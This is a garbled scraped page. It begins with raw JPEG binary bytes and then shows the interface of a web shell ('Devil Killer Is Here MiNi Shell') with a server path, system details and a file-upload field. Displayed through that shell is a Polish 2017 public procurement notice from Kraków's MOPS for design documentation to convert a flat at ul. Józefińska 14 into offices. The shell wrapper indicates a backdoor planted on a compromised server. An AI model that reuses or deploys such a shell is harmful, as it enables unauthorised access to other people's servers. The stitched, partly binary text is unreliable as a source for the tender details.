JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170105/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170105/3417-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.mops.krakow.pl' target='_blank'>http://www.mops.krakow.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 3417 - 2017
              z dnia 2017-01-05 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kraków: Opracowanie dokumentacji projektowej przebudowy,                        remontu i zmiany sposobu użytkowania lokalu numer 1                            w budynku przy ul. Józefińskiej 14 w Krakowie<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miejski Ośrodek Pomocy Społecznej w Krakowie, krajowy numer identyfikacyjny
              35150530800000, ul.
              ul. Józefińska 
              14,
              30529  
              Kraków, woj.
              małopolskie, państwo
              Polska, tel.
              12 6165482, 6165469, e-mail
              do@poczta.mops.krakow.pl, faks
              126 165 428.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.mops.krakow.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Wykonawca składa ofertę - pod rygorem nieważności - w formie pisemnej albo               w postaci elektronicznej, opatrzoną bezpiecznym podpisem elektronicznym weryfikowanym przy pomocy ważnego kwalifikowanego certyfikatu<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Opracowanie dokumentacji projektowej przebudowy,                        remontu i zmiany sposobu użytkowania lokalu numer 1                            w budynku przy ul. Józefińskiej 14 w Krakowie<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowo                    wykonawczej oraz uzyskanie decyzji o pozwoleniu na budowę i zmianę sposobu użytkowania dla przeprowadzenia prac w zakresie przebudowy i remontu wraz                           ze zmianą sposobu użytkowania lokalu mieszkalnego na lokal użytkowy, położonego przy ul. Józefińskiej 14/1, w Krakowie na potrzeby biurowe Miejskiego Ośrodka Pomocy Społecznej. Obiekt, w którym mieści się lokal będący przedmiotem zamówienia znajduje się na terenie urbanistycznym dzielnicy Podgórze,                             jest ujęty w miejscowym planie zagospodarowania przestrzennego obszaru Stare Podgórze - Limanowskiego (U.1  Tereny zabudowy usługowej,                                    o podstawowym przeznaczeniu pod zabudowę usługową). Lokal mieszkalny,                       którego przebudowę i adaptację ma objąć dokumentacja projektowa, mieści się na pierwszym piętrze budynku oficyny przy ul. Józefińskiej 14. Lokal posiada całkowitą powierzchnię użytkową 50,08m2, stanowi własność Gminy Miejskiej Kraków                              i jest administrowany przez Zarząd Budynków Komunalnych w Krakowie.                            Przed zmianą sposobu użytkowania zamawiający nie będzie posiadał tytułu prawnego do lokalu. Wszelkie działania związane z realizacją przedmiotu zamówienia wykonawca będzie prowadził na podstawie pełnomocnictw udzielonych przez ZBK. 

Roboty budowlane, które mają zostać uwzględnione w  dokumentacji projektowej mają obejmować wszystkie elementy charakterystyczne dla działalności w nowoczesnym środowisku biurowym oraz obowiązujące przepisy prawa w zakresie prawa pracy, ochrony pożarowej, BHP, prawa budowlanego, wymogów sanitarno                                                       -epidemiologicznych, w tym w szczególności:
1)	przebudowę pomieszczeń na potrzeby biurowe Miejskiego Ośrodka Pomocy Społecznej w Krakowie,
2)	remont instalacji c.o., w razie konieczności z wymianą grzejników,
3)	przebudowę i remont instalacji wodno-kanalizacyjnej,
4)	rozbudowę instalacji wentylacyjnej,
5)	rozbudowę i remont instalacji elektrycznej, w tym wykonanie odrębnej instalacji dedykowanej do sprzętu komputerowego (po dwa gniazda pojedyncze zlokalizowane bezpośrednio przy gniazdach instalacji logicznej) oraz zaprojektowanie odpowiedniego oświetlenia sztucznego w pomieszczeniach o wymaganej mocy na stanowisku pracy,
6)	budowę instalacji logicznej: gniazda podwójne rozmieszczone w narożach pomieszczeń biurowych  ok. 0,5  0,8 m od naroża, po jednym gnieździe podwójnym na pracownika plus dodatkowe gniazdo podwójne do urządzeń sieciowych (drukarki, kserokopiarki), w przypadku pomieszczeń o wymiarach większych niż 5m, dodatkowe gniazdo podwójne na środku ściany, w przypadku naroży ze ścianą                         z oknem, gniazda umieszczać na ścianie okiennej, należy również zaprojektować połączenie sieci z serwerownią znajdująca się w sąsiednim lokalu MOPS                                     przy ul. Józefińskiej 14, za pomocą 4 włóknowego kabla światłowodowego jednomodowego,
7)	wykonanie instalacji alarmowej z czujnikami ruchu w każdym pomieszczeniu oraz czujnikami otwarcia drzwi wejściowych do lokalu a także integracja z systemem sąsiedniego budynku MOPS,
8)	wymianę stolarki okiennej i drzwiowej (zewnętrznej i wewnętrznej),
9)	uzupełnienie tynków i malowanie ścian wewnątrz lokalu,
10)	przebudowę sanitariatu,
11)	wykonanie posadzek z płytek ceramicznych i wykładziny PCV,
12)	cyklinowanie i malowanie parkietu, 
13)	remont oraz, w razie konieczności, przebudowę klatki schodowej,
14)	remont dachu i kominów,
15)	likwidację przyczyn i skutków przeciekania wody na klatkę schodową,
16)	inne roboty budowlane, które są niezbędne dla zapewnienia estetyki, funkcjonalności oraz uwarunkowane w/w wymogami.
2.	Rozwiązania techniczne oraz użyte materiały/wyposażenie/sprzęty mają być estetyczne, trwałe i dostosowane do funkcji lokali i nieruchomości, z zastrzeżeniem, że nie mogą być to rozwiązania drogie i ekonomicznie nieuzasadnione, tzn. jedynym uzasadnieniem drogiego rozwiązania/materiału/wyposażenia będzie wyłącznie jego estetyka lub zaproponowany materiał będzie kilkukrotnie droższy od innych spełniających te same funkcje, mających odpowiednią jakość.
3.	W skład dokumentacji wchodzi:
1)	Opracowanie koncepcji architektonicznej i przedłożenie jej do akceptacji zamawiającemu,
2)	Opracowanie  projektu architektonicznego i aranżacji wnętrza pod kątem doboru kolorystyki i materiałów wykończeniowych, 
3)	Projekt budowlany  wraz z niezbędnymi uzgodnieniami umożliwiającymi uzyskanie decyzji o pozwoleniu na budowę wraz ze zmianą sposobu użytkowania,
4)	Projekty wykonawcze, uzupełniające i uszczegółowiające projekt budowlany                    w zakresie i stopniu niezbędnym do przygotowania oferty przez wykonawcę robót budowlanych oraz przeprowadzenie tych robót, w tym projekty branżowe.
5)	Specyfikacja techniczna wykonania i odbioru robót budowlanych, zawierająca szczegółowy opis wymagań niezbędnych do określenia:
a)	standardu, sposobu i jakości wykonania robót,
b)	standardu, jakości i właściwości użytych materiałów,
c)	sposobu odbioru robót i wymogów zamawiającego przy odbiorze. 
6)	Przedmiary robót zawierające zestawienie przewidywanych do wykonania robót                w kolejności technologicznej ich wykonania, wraz z ich szczegółowym opisem, miejscem wykonania, lub wskazaniem podstaw ustalających szczegółowy opis,                    z wyliczeniem i zestawieniem ilości jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalenia cen jednostkowych robót lub jednostkowych nakładów rzeczowych.
7)	Kosztorysy inwestorskie, opracowane na podstawie przedmiarów, o których mowa w pkt. 6.
8)	Zestawienie materiałów urządzeń i wyposażenia.
9)	Informacja dotycząca bezpieczeństwa i ochrony zdrowia (BIOZ).
10)	Dokumentacja powykonawcza z zaznaczeniem zmian stanowiących nieistotne odstępstwo od zatwierdzonego projektu budowlanego (jeżeli takie zmiany będą) na potrzeby zgłoszenia do Powiatowego Inspektoratu Nadzoru Budowlanego.
4.	Szczegółowe wymagania dot. elementów dokumentacji projektowej:

Ad. 1 Koncepcja architektoniczna służy jako dane wyjściowe do projektowania, wykonawca zobowiązany jest uzyskać akceptację zamawiającego oraz Zarządu Budynków Komunalnych w Krakowie w zakresie przyjętych rozwiązań  przed przystąpieniem do prac nad projektem budowlanym i wykonawczym. Wykonawca zobowiązany jest do uwzględnienia uwag zmawiającego oraz Zarządu Budynków Komunalnych do koncepcji, z wyjątkiem sytuacji, kiedy ich realizacja naruszałaby obowiązujące przepisy prawa.

Ad. 3  Projekt budowlany ma być sporządzony zgodnie z wymaganiami określonymi w przepisach rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 roku w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 roku, poz. 462 z późniejszymi zmianami).                                      Projekt budowlany ma być zgodny z koncepcją architektoniczną.

Ad. 4 Projekt wykonawczy ma uszczegóławiać dokumentację projektową w sposób pozwalający na bezproblemowe wykonywanie robót budowlanych i nie pozostawiający wątpliwości co do zakresu robót budowlanych. Projekt wykonawczy ma być zgodny                      z koncepcją architektoniczną. Zamawiający może zlecić osobie trzeciej czynności sprawdzenia projektu wykonawczego. Wykonawca zobowiązany jest do wprowadzenia zmian/poprawek w projekcie i/lub jego uzupełnienia w zakresie wskazanym przez osobę sprawdzającą, pod warunkiem że nie stoi to w sprzeczności z obowiązującymi przepisami prawa.

Ad. 5  Specyfikacja techniczna ma uwzględniać wymagania wynikające z przepisów rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno  użytkowego                  (tekst jednolity: Dz. U. z 2013 roku, poz.  1129), w szczególności w zakresie podanym         w §13 i 14.  
- Specyfikacja ma w sposób szczegółowy opisywać wymogi dotyczące użytych materiałów, bez naruszenia przepisów ustawy z dnia 29 stycznia 2004 roku                              Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2015 roku, poz. 2164                                       z późniejszymi zmianami), w szczególności w zakresie podawania marek i nazw własnych. Specyfikacja ma zapobiec zastosowaniu materiałów niskiej jakości.                           Opis  materiałów nie może ograniczać konkurencji w rozumieniu przepisów                              ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (tekst jednolity:                      Dz. U. z 2015 roku, poz. 2164 z późniejszymi zmianami), a w szczególności nie może jednoznacznie wskazywać na zastosowanie materiałów jednego dostawcy.                                        Jeżeli dokumentacja projektowa lub specyfikacja techniczna wykonania i odbioru robót wskazywałaby w odniesieniu do niektórych materiałów znaki towarowe lub pochodzenie zamawiający, zgodnie z art.29 ust. 3 ustawy z dnia 29 stycznia 2004 roku                              Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2015 roku, poz. 2164                                        z późniejszymi zmianami) dopuszcza użycie produktów równoważnych.                        Wszelkie produkty pochodzące od konkretnych producentów, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać towary, aby spełnić wymagania stawiane przez zamawiającego i stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia. Poprzez zapis dot. minimalnych wymagań  parametrów jakościowych, zamawiający rozumie wymagania towarów zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów. Operowanie przykładowymi nazwami producenta, ma jedynie na celu doprecyzowanie poziomu oczekiwań zamawiającego w stosunku do określonego rozwiązania. Posługiwanie się nazwami producentów (produktów) ma wyłącznie charakter przykładowy. Zamawiający,                             przy opisie przedmiotu zamówienia, wskazując oznaczenie  konkretnego producenta (dostawcy) lub konkretny produkt, dopuszcza jednocześnie produkty równoważne                              o parametrach jakościowych i cechach użytkowych, co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych parametrach lub lepszych. W takiej sytuacji zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały. Zamawiający może zlecić sprawdzenie specyfikacji technicznej osobie trzeciej. Wykonawca zobowiązany jest do wprowadzenia zmian                           /poprawek w specyfikacji i/lub jej uzupełnienia w zakresie wskazanym przez osobę sprawdzającą, pod warunkiem że nie stoi to w sprzeczności z obowiązującymi przepisami prawa.

Ad. 6  Przedmiar robót ma uwzględnić wymagania wynikające z przepisów rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno  użytkowego                  (tekst jednolity: Dz. U. z 2013 roku, poz.  1129), w szczególności w zakresie wskazanym    w §6-10. Zamawiający może zlecić sprawdzenie przedmiaru osobie trzeciej.                   Wykonawca zobowiązany jest do wprowadzenia zmian/poprawek w przedmiarze i/lub jego uzupełnienia w zakresie wskazanym przez osobę sprawdzającą, pod warunkiem                  że nie stoi to w sprzeczności z obowiązującymi przepisami prawa.

Ad. 7 Kosztorysy mają być opracowane zgodnie z przepisami rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 roku, Nr 130, poz. 1389). Zamawiający może zlecić osobie trzeciej sprawdzenie kosztorysów. Wykonawca zobowiązany jest do wprowadzenia zmian/poprawek w kosztorysach i/lub ich uzupełnienia w zakresie wskazanym przez osobę sprawdzającą, pod warunkiem że nie stoi to w sprzeczności                     z obowiązującymi przepisami prawa.

Ad. 8 Opracowanie ma zawierać wykaz wszystkich materiałów, urządzeń                                   i wyposażenia, które mają być użyte do realizacji robót budowlanych prowadzonych                       w oparciu o projekt wykonawczy oraz w które ma być wyposażony lokal i które mają wpływ na jakość, trwałość, estetykę, ergonomię lub są konieczne z uwagi na specyfikę prac/obiektu/sposobu użytkowania. W wykazie tym należy podać markę i model urządzenia/materiału/wyposażenia, które przyjął projektant oraz wskazać wszystkie istotne parametry tych urządzeń/materiałów/wyposażenia (np. wymiary, wytrzymałość, klasę ścieralności, grubość itp.), które pozwolą na złożenie właściwej oferty                                         w postępowaniu przetargowym na wykonanie robót budowlanych. Wykonawca zobowiązany jest podać w wykazie kolorystykę materiałów/sprzętów/urządzeń.

Przedmiot zamówienia ma uwzględniać wszystkie przepisy wymagane dla zapewnienia prawidłowej eksploatacji budynku, w tym w szczególności określone                          w regulacjach wskazanych w pkt. 15.

5.	Wykonawca złoży również wniosek i uzyska decyzję o pozwoleniu na budowę i zmianę sposobu użytkowania. W zakres tego etapu wykonania przedmiotu zamówienia wchodzi również uzyskanie wszelkich uzgodnień, opinii itp. niezbędnych do uzyskania pozwolenia (w tym w szczególności Konserwatorem Zabytków oraz rzeczoznawców). Wykonawca zobowiązany jest również do uzyskania wszelkich innych wymaganych prawem decyzji i pozwoleń, jeżeli będą one niezbędne do uzyskania pozwolenia na budowę i zmianę sposobu użytkowania. W celu realizacji tych działań wykonawca zostanie stosownie umocowany przez Zarząd Budynków Komunalnych w Krakowie                        do występowania w jego imieniu.
6.	W ramach przedmiotu zamówienia zostanie również sporządzona inwentaryzacja                   w zakresie niezbędnym do sporządzenia opracowania będącego przedmiotem niniejszego zamówienia. 
7.	Sprawowanie nadzoru autorskiego nad realizacją robót wykonywanych                                      wg. dokumentacji wchodzącej w skład przedmiotu zamówienia. W ramach tego etapu realizacji zamówienia wykonawca zobowiązany jest do pełnienia nadzoru autorskiego nad realizacją robót prowadzoną na podstawie opracowanej dokumentacji projektowo  wykonawczej, zgodnie z aktualnymi przepisami prawa, obowiązującymi normami i standardami w zakresie sprawowania nadzoru autorskiego. W ramach nadzoru autorskiego wykonawca zobowiązany jest między innymi do:
a)	udziału w odbiorach końcowych, częściowych oraz odbiorach robót ulegających zakryciu,
b)	wskazywania rozwiązań problemów wynikłych w trakcie realizacji robót wykonywanych na podstawie dokumentacji projektowo  wykonawczej wchodzącej w zakres przedmiotu niniejszego zamówienia, w terminie do 3 dni roboczych od daty zgłoszenia problemu przez zamawiającego. Rozwiązania mają być kompleksowe i kompletne, z punktu widzenia celu jakiemu mają służyć,                        tj. umożliwiać kontynuację realizacji robót budowlanych.                                                                     W szczególnie uzasadnionych przypadkach dopuszcza się przedłużenie tego terminu do 7 dni,
c)	kontrolowania zgodności wykonania prac budowlanych ze sporządzoną dokumentacją projektowo  wykonawczą, wchodzącą w skład przedmiotu niniejszego zamówienia,
d)	sporządzania kosztorysów na roboty dodatkowe i zamienne, wykonywania korekt dokumentacji oraz dodatkowych uzgodnień, jeżeli będą one wymagane,
e)	natychmiastowego nakazywania przerwania prowadzenia robót budowlanych,                    w przypadku stwierdzenia niewłaściwego, niezgodnego z dokumentacją, sztuką budowlaną, lub obowiązującymi przepisami ich wykonywania. W takim wypadku wykonawca natychmiast powiadomi zamawiającego o nakazie przerwania prac,
f)	częstotliwość kontroli placu budowy ma zapewnić należytą kontrolę nad realizacją robót budowlanych, ze szczególnym uwzględnieniem postanowień                             pkt. c oraz e. Ponadto wykonawca ma się każdorazowo stawić na placu budowy na wezwanie zamawiającego.
8.	Planowany termin realizacji robót budowlanych:  maj - październik 2017 roku.



9.	Terminy wykonania zamówienia:
1)	Opracowanie koncepcji architektonicznej dotyczącej przebudowy i remontu                              do 30 dni od daty zawarcia umowy. 
2)	Opracowanie kompletnego projektu budowlanego, wraz ze wszystkimi niezbędnymi uzgodnieniami i pozwoleniami oraz złożenie wniosku w sprawie wydanie decyzji o pozwoleniu na budowę oraz zmianę sposobu użytkowania                            do 100 dni od daty zawarcia umowy.  
3)	Doręczenie zamawiającemu kompletnej dokumentacji objętej przedmiotem zamówienia  do 120 dni od daty zawarcia umowy.
4)	Uzupełnienie wniosku o wydanie pozwolenia na budowę oraz zmianę sposobu użytkowania lokalu, z wyłączeniem oświadczenia o dysponowaniu nieruchomością na cele budowlane oraz pełnomocnictwa udzielonego wykonawcy przez Zarząd Budynków Komunalnych w Krakowie  do 7 dni                            od daty otrzymania wezwania o usunięcie braków i nie dłużej niż termin wskazany w tym wezwaniu.
5)	Akceptacja zestawienia materiałów/wyposażenia/sprzętów/urządzeń z ofert składanych na roboty budowlane  do 3 dni roboczych od daty przekazania ich przez zamawiającego.
6)	Opracowanie dokumentacji powykonawczej z zaznaczonymi zmianami stanowiącymi nieistotne odstępstwo od zatwierdzonego projektu budowlanego  do 14 dni od daty końcowego odbioru robót. 
10.	Na etapie składania ofert na roboty budowlane, które będą prowadzone w oparciu                     o dokumentację projektową sporządzoną przez wykonawcę, wykonawca robót zaopiniuje zaproponowane zamienniki materiałów/urządzeń/sprzętów pod kątem ich zgodności z parametrami określonymi w dokumentacji projektowej. W tym celu otrzyma od zamawiającego wykaz materiałów/urządzeń/sprzętów załączony                               do oferty na wykonanie robót budowlanych wraz z dokumentami potwierdzającymi parametry tych materiałów/urządzeń/sprzętów. Wykonawca ma obowiązek uzasadnić brak akceptacji zaoferowanych przez wykonawcę robót budowlanych materiałów/urządzeń/sprzętów.
11.	Dokumentacja wykonawcza (projekty wykonawcze, w tym branżowe, specyfikacje techniczne wykonania i odbioru robót, kosztorysy inwestorskie i przedmiary, zestawienia materiałów, urządzeń i wyposażenia) zostanie dostarczona zamawiającemu w 3 jednobrzmiących egzemplarzach, w formie papierowej                                       oraz w wersji elektronicznej, wyłącznie jako skan jednego z egzemplarzy,                                         w formie plików *.pdf  (osobny plik dla każdego z elementów, o których mowa                            w ust. 3 pkt. 1-9). Ponadto wykonawca dostarczy wszystkie rysunki wchodzące                       w skład dokumentacji projektowej, na osobnym nośniku, w postaci plików *.dwg. 
